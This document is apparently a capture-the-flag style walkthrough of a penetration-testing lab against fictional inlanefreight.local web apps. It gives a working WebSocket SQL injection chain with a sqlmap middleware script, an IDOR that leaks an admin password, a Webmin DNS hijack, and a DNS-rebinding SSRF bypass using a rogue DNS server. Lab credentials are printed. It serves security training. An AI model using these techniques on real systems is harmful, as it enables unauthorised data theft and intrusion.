# Skills Assessment ## Scenario Inlanefreight has contacted us to conduct an external penetration test against their web applications. They are launching a groundbreaking PDF creator. ### In-Scope Subdomains | Target | Local Port | | --------------------------- | ---------- | | library.inlanefreight.local | 8001 | | vault.inlanefreight.local | 8002 | | pdf.inlanefreight.local | 8003 | | webmin.inlanefreight.local | 10000 | > **Note:** Certain web applications only function properly with the corresponding local port value. ### Setup /etc/hosts ```bash sudo tee -a /etc/hosts > /dev/null < library.inlanefreight.local vault.inlanefreight.local webmin.inlanefreight.local pdf.inlanefreight.local EOT ``` *** ## Question 1: Library Web Application Flag ### Vulnerability: WebSocket SQLi 1. Navigate to `library.inlanefreight.local:8001` 2. Search for user messages → Notice WebSocket connections in Burp 3. Username sent via JSON to `/dbconnector` endpoint ### Exploitation **Create sqlmap middleware:** ```python from flask import Flask, request from websocket import create_connection import json app = Flask(__name__) WS_URL = 'ws://library.inlanefreight.local:8001/dbconnector' @app.route('/') def index(): req = {} req['username'] = request.args.get('username', '') ws = create_connection(WS_URL) ws.send(json.dumps(req)) r = json.loads(ws.recv()) ws.close() if r.get('error'): return r['error'] return r['messages'] app.run(host='127.0.0.1', port=8000) ``` **Run middleware:** ```bash python3 sqlmapMiddleware.py ``` **Confirm SQLi:** ```bash sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --batch --threads=10 ``` **Enumerate databases:** ```bash sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --dbs --threads=10 ``` **Enumerate tables:** ```bash sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --tables -D db --threads=10 ``` **Dump flag:** ```bash sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' -T flag --dump --threads=10 ``` *** ## Question 2: htb-stdnt Password ### Exploitation Using same middleware, dump users table: ```bash sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' -T users --dump --threads=10 ``` **Result:** ``` +----+---------------------+--------------------+-----------+ | id | message | password | username | +----+---------------------+--------------------+-----------+ | 1 | Administrator User | admin | admin | | 2 | HTB Staff User | HTB_@cad3my_Stdnt! | htb-stdnt | +----+---------------------+--------------------+-----------+ ``` **Credentials:** `htb-stdnt:HTB_@cad3my_Stdnt!` *** ## Question 3: Vault Admin Password ### Vulnerability: Second-Order IDOR 1. Navigate to `vault.inlanefreight.local:8002` 2. Login with `htb-stdnt:HTB_@cad3my_Stdnt!` 3. Hover over "My Vault" → Notice URL parameter `id` ### Exploitation 1. Intercept request to view vault 2. Change `id` value to `1` (admin's vault) 3. **Don't follow redirect** 4. Refresh `/display_data.php` directly **Result:** Admin's Webmin password: `AdM1N@v@uL1` *** ## Question 4: PDF Application Flag ### Vulnerability: DNS Rebinding SSRF Bypass The PDF app at `pdf.inlanefreight.local:8003` has SSRF filters blocking private IPs. ### Step 1: Access Webmin Login to `webmin.inlanefreight.local:10000` with `admin:AdM1N@v@uL1` ### Step 2: Change DNS Settings Navigate to: `Networking → Network Configuration → Hostname and DNS Client` Set DNS server to your tun0 IP: ```bash ip -o -4 a show tun0 | cut -d " " -f 7 ``` ### Step 3: Setup DNSrebinder ```bash git clone https://github.com/mogwailabs/DNSrebinder.git cd DNSrebinder/ python3 -m venv DNSrebinder source DNSrebinder/bin/activate pip3 install -r requirements.txt ``` **Start rogue DNS server:** ```bash sudo python3 dnsrebinder.py --domain google.com --ip 1.1.1.1 --rebind 127.0.0.1 --counter 1 --tcp --udp ``` ### Step 4: Exploit Visit `pdf.inlanefreight.local:8003` and request: ``` http://google.com:8003/flag ``` **DNS Rebinding Flow:** 1. First resolution: `google.com` → `1.1.1.1` (passes SSRF filter) 2. Second resolution: `google.com` → `127.0.0.1` (bypasses to localhost) **Result:** Flag displayed in generated PDF! *** ## Attack Chain Summary ``` ┌─────────────────────────────────────────────────────────────────────────┐ │ Skills Assessment Attack Flow │ ├─────────────────────────────────────────────────────────────────────────┤ │ │ │ 1. Library (WebSocket SQLi) │ │ └── sqlmap middleware → dump flag table → get credentials │ │ │ │ 2. Vault (Second-Order IDOR) │ │ └── Login with htb-stdnt creds │ │ └── Change id=1, don't follow redirect → admin Webmin password │ │ │ │ 3. Webmin (DNS Configuration) │ │ └── Login with admin creds │ │ └── Point DNS to attacker's rogue DNS server │ │ │ │ 4. PDF (DNS Rebinding) │ │ └── DNSrebinder: 1.1.1.1 → 127.0.0.1 │ │ └── Request http://google.com:8003/flag → bypass SSRF → get flag │ │ │ └─────────────────────────────────────────────────────────────────────────┘ ```